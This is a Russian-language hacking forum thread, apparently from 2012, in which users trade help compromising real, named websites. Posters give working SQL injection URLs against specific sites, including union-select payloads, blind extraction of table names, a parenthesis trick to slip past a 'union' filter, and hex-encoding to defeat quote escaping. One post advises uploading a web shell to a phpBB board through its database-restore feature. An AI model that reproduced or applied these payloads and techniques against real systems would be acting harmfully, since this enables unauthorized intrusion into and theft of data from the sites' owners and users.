30.05.2012, 00:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
народ, как залить шел в phpBB 2.0.23??
есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.
чёза бред, как быть?
старый добрый метод кто отменял?
грузи через восстановление базы
|
|
|
30.05.2012, 00:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Konqi
старый добрый метод кто отменял?
грузи через восстановление базы
там, нет встановления базы
|
|
|
|
30.05.2012, 14:19
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от None
http://www.rusmg.ru/php/content.php?id=6721+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+--+
не могу вывести
|
|
|
|
30.05.2012, 15:40
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от shadowrun
не могу вывести
крути как блинд
Сообщение от None
http://www.rusmg.ru/php/content.php?id=6721+and+ascii(mid((select+table_na me+from+information_schema.tables+limit+0,1),1,1)) %3E=67+--+
первую букву я тебе уже нашел "C" - char(67)
|
|
|
|
30.05.2012, 21:35
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 26
С нами:
9180250
Репутация:
10
|
|
http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11
фильтрация union. есть какие-то варианты обойти кроме вслепую?
|
|
|
|
30.05.2012, 22:25
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Dr.Strangelove
http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11
фильтрация union. есть какие-то варианты обойти кроме вслепую?
Код:
http://www.printingmuseum.org/eventdetail.php?id=-74+union(select(1),2,3,version(),5,6,7,8,9,10,11)
Вы даже не пытались обойти!
|
|
|
|
31.05.2012, 00:55
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от shadowrun
не могу вывести
http://www.rusmg.ru/php/content.php?id=6721+and+0+union+select+1,version() ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--+
Сообщение от winstrool
крути как блинд
Классный совет, хеккер.
|
|
|
|
31.05.2012, 13:08
|
|
Новичок
Регистрация: 30.04.2012
Сообщений: 25
С нами:
7386806
Репутация:
0
|
|
Что не так делаю?
Сообщение от None
http://www.med-ray.ru/view.php?ID=-195+union+select+1,2,3,4,5,group_concat(table_name ),7,8,9,10,11,12+from+information_schema.tables+wh ere+table_schema=%28medray%29+--+
|
|
|
|
31.05.2012, 13:12
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от mr_zedox
Что не так делаю?
в неправильном синтаксисе:
table_schema=(medray)
Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)
table_schema=0x6d6564726179
или для примера
table_schema=(0x6d6564726179)
|
|
|
|
31.05.2012, 13:20
|
|
Новичок
Регистрация: 30.04.2012
Сообщений: 25
С нами:
7386806
Репутация:
0
|
|
Сообщение от Melfis
в неправильном синтаксисе:
table_schema=(medray)
Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)
table_schema=0x6d6564726179
или для примера
table_schema=(0x6d6564726179)
Благодарю, второй способ с скобками работает, а еще один вопрос назрел: каким сервисом пользоваться, чтобы перевести название слова в 0x.....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
